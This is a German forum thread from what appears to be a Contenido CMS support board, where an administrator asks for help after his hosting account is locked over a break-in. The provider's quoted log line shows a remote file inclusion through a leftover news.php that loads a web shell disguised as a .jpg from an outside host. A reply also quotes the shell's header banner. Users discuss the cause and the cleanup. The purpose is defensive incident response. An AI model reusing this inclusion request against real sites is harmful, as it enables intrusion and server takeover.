Brauche Dringend Hilfe

[macbill]

Hallo

Ich hoffe dies ist die richtige Sparte ??

Habe n dickes Problem. Der Account, den ich verwalte, wurde gesperrt. Dazu gab´s eine mail vom Provider:

Code: Alles auswählen

Guten Tag!

Leider mussten wir Ihren Account "sunny-domestozs.de" erneut sperren. Trotz 
 
Ihrer Zusage, dass Sie das Sicherheitsproblem behoben haben, erfolgte ein neuer Hackangriff. Wenn wir Ihnen dieses Sicherheitsproblem mitteilen, so ist es ein ernsthaftest Sicherheitsrisiko vorhanden. Dies sollten Sie ernst nehmen. Ein Hacker hat über Ihren Account verbotene Skripte auf dem Server ausgeführt. 

Überprüfen Sie alle Inhalte auf Ihrem Speicherplatz, sollten hier Dateien 
liegen, die nicht von Ihnen sind, so löschen Sie diese bitte. Updaten/Fixen 

oder löschen Sie auch die unsicheren Skripte.

Der Hacker kam über folgendes Skript:

cwt.cs.nchu.edu.tw - - [21/Oct/2007:12:51:33 +0200] "GET /home/contenido/external/frontend/news.php?img=2 HTTP/1.1" 200 4098 "http://www.sunny-domestozs.de/home//contenido/external/frontend/
news.php?cfg[path][includes]=http://www.germania-neureut.de/files/
Bild_163.jpg?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it;$

Bitte seien Sie sich im klaren, dass auch uns ein wirtschaftlicher und Image Schaden hierdurch entsteht. Aus Kulanzgründen informieren wir den Kunden bei einem unsicheren Skript über die Misslage, berechnen aber keine Gebühren. Jedes weitere Mal berechnen wir die entstandene Arbeitszeit des Technikers, um den Angriff abzuwehren, Accountsperrung etc.

Was kann das sein? Weiss mir keinen Rat. Was kann ich tun, um dem Abhilfe zu schaffen. Brauche schnelle Hilfe, da einige Leute schon recht sauer sind, da es das zweite mal ist, das so etwas passiert.

[kummer]

welche contenido-version verwendest du?

[MichFress]

schau mal hier im Forum nach, du wirst einige Anhaltspunkte für dein weiteres Vorgehen finden..

in etwa:
- schau nach, ob du Dateien auf deinem Server hast, die dort nicht hingehören (und lösche sie natürlich)
- mach ein Update auf das aktuelle Contenido
- lösche die news.php (wird in Contenido aktuell nicht mehr benutzt)
- bitte bei deinem Provider um Vergebung

hab ich was vergessen?

[macbill]

Ich benutze Version 6.6.15.

Und wie kann ich dann überprüfen, ob das was gebracht hat? Ich meine, das es somit keine Sicherheitslück gibt?

[wosch]

Das ist ein russisches Hackscript (php-Shell) das als jpg getarnt dort auf deinem Server ausgeführt wurde.

Ich kann (und will es auch nicht) beurteilen ob das eine Lücke in Contendio ist,
(wenn ja, sollten bei den Entwicklern ALLE Alarmglocken klingen !!!)
oder eine Lücke durch Fehlkonfiguration deines Providers.

[macbill]

Das wäre ja was mich interessiert. Ob es nun mein fehler oder der des providers ist. ...... und wie alles wieder gut wird.

[wosch]

Das wäre ja was mich interessiert. Ob es nun mein fehler oder der des providers ist. ...... und wie alles wieder gut wird.

Falsch.
Du hast keinen Fehler gemacht.
Entweder ist es:
Fehler Contenido (da müßten die Entwickler was zu sagen, die schweigen lieber/und ich glaube auch nicht das es Contenido schuld ist!!!)
oder Fehler Provider der bei der Konfuguration mehr als geschludert haben müßte.

[wosch]

Der Kopf des Scrpites:

Code: Alles auswählen

<?php


/******************************************************************************************************/
/*
/*                                     #    #        #    #
/*                                     #   #          #   #
/*                                    #    #          #    #
/*                                    #   ##   ####   ##   #
/*                                   ##   ##  ######  ##   ##
/*                                   ##   ##  ######  ##   ##
/*                                   ##   ##   ####   ##   ##
/*                                   ###   ############   ###
/*                                   ########################
/*                                        ##############
/*                                 ######## ########## #######
/*                                ###   ##  ##########  ##   ###
/*                                ###   ##  ##########  ##   ###
/*                                 ###   #  ##########  #   ###
/*                                 ###   ##  ########  ##   ###
/*                                  ##    #   ######   #    ##
/*                                   ##   #    ####   #    ##
/*                                     ##                 ##
/*
/*
/*
/*  rxxshell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü ñèñòåìíûå êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
/*  Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.xxxx.xx
/*  Âåðñèÿ: 1.3 (05.03.2006)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/*  Îòäåëüíàÿ áëàãîäàðíîñòü çà ïîìîùü è èäåè: blf, phoenix, virus, NorD è âñåì ÷åðòÿì èç RST/GHC.
/*  Åñëè ó Âàñ åñòü êàêèå-ëèáî èäåè ïî ïîâîäó òîãî êàêèå ôóíêöèè ñëåäóåò äîáàâèòü â ñêðèïò òî ïèøèòå
/*  íà xxx@xxxx.xx. Âñå ïðåäëîæåíèÿ áóäóò ðàññìîòðåíû.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

[macbill]

Ach Du Sch..... das sieht aber böse aus. Falls es ein fehler in contenido ist, gibt es jemanden, der eine Lösung weiss? Oder fallls der Provider geschlampt hat, was kann man da tun?

[wosch]

So, ich habe nun ein bischen im Forum gesucht.

Ich fürchte, es ist Contenido schuld.

Der Code wurde eingeschleust über:
home/contenido/external/frontend/news.php?xxx

Bei einer Version 4.6.x gibt es keine news.php in dem Verzeichnis.
Deine Version wurde mal upgedatet von einer Version 4.4.x auf 4.6.x

In der Version 4.4.x gibt es diese news.php,
und diese Datei ist bekannt dafür das sie sich zum einschleusen von Fremdcode eignet.

Bei einem Update werden alte Dateien nicht überschrieben/gelöscht, also bleibt auch nach einem Update, das vermeintlich Contrenido sicher macht, die alte Gefahr weiterhin bestehen und läßt weiterhin eine Übernahme der Website durch Angreifer zu.

Ein bischen Historie:
Hier ist exakt der gleiche Angriff, mit einer 4.4.x geschildert:
http://www.contenido.de/forum/viewtopic.php?t=18318

Und noch ein Wort an die @Contenido-Verantwortlichen.
Anscheinend schießen sich die Hacker auf ge-updatete Version von Contenido ein,
und über die news.php (der Version 4.4.x) kommt man schön in Contenido (egal welche Version)-> es wäre an der Zeit sich mal Gedanken zu machen über ...

(Und nicht nur CSS-Schrott-Spielereien in neuen Versionen als OHA_wie_nett zu verkaufen !!!)

[macbill]

Das hieße nun, wenn ich die news.php lösche, was bereits geschehen ist, müsste das Problem behoben sein?

[wosch]

Das hieße nun, wenn ich die news.php lösche, was bereits geschehen ist, müsste das Problem behoben sein?

NEIN !!!
Eben nicht.
Diese Scripte können weiteres installieren, ganz unscheinbar, du merkst es nicht.

Du mußt verfahren wie ...

Und genau um diese Beschreibung hatte ich die Admin/Mods hier schon gebeten zu veröffentlichen.
Es ist immer die gleiche Verfahrensweise.


Es macht mir aber mittlerweile keinen Spaß mehr immer und immer wieder das gleiche zu schreiben.
Entweder die Admins/Mods bewegen sich mal und kopieren die Vorgehensweise in einer Beitrag in Tipps&Tricks

oder

du mußt hier im Forum suchen was, wie man machen mußt.

Sorry, ist keine Bosheit von mir, aber wer totschweigt das Contenido zu hacken ist / mit erfolg gehackt wird ->
kann nicht durch Verneinung erreichen das Contenido nicht unter Beschuß der Cyber-Kriminellen steht und meint "alles ist gut" !!!

[macbill]

Ne, hab ich nicht als Boshaftigkeit wahrgenommen. Ist zwar anz schön aufwändig, aber was anderes bleibt mir scheinba nicht übrig richtig? Hoffentlich haut das alles auch hin.....

[macbill]

Das heisst dann, der Richtigkeit halber, für mich nun:
Alles vom server löschen (backup inkl. DB vorher ist klar).
Dann die Version 4.6.23 aufspielen, update setup und die upload Dateien wieder einspielen. Richtig? oder habe ich etwas vergessen?

[holger.librenz_4fb]

Hi.

In solchen Fällen würde ich den gesamten Webspace leeren, die DB sichern und alles neu aufsetzen. Am Besten wäre es, wenn Du ein Backup hättest, was Du einspielen kannst (in die DB!).

Wie hast Du damals das Update auf die 4.6.15 gemacht? Hattest Du die news.php gelöscht? Sicher das es eine 4.6.15er Contenido Version war?

@wosch: Wer verschweigt denn die Lücken von Contenido? Soweit ich es mitbekommen habe gibt es sehr wohl Infos von Entwicklern, wie HerrB oder mir. Ansonsten bin ich gern für Tipps und Hinweise dankbar

Gruß, Holger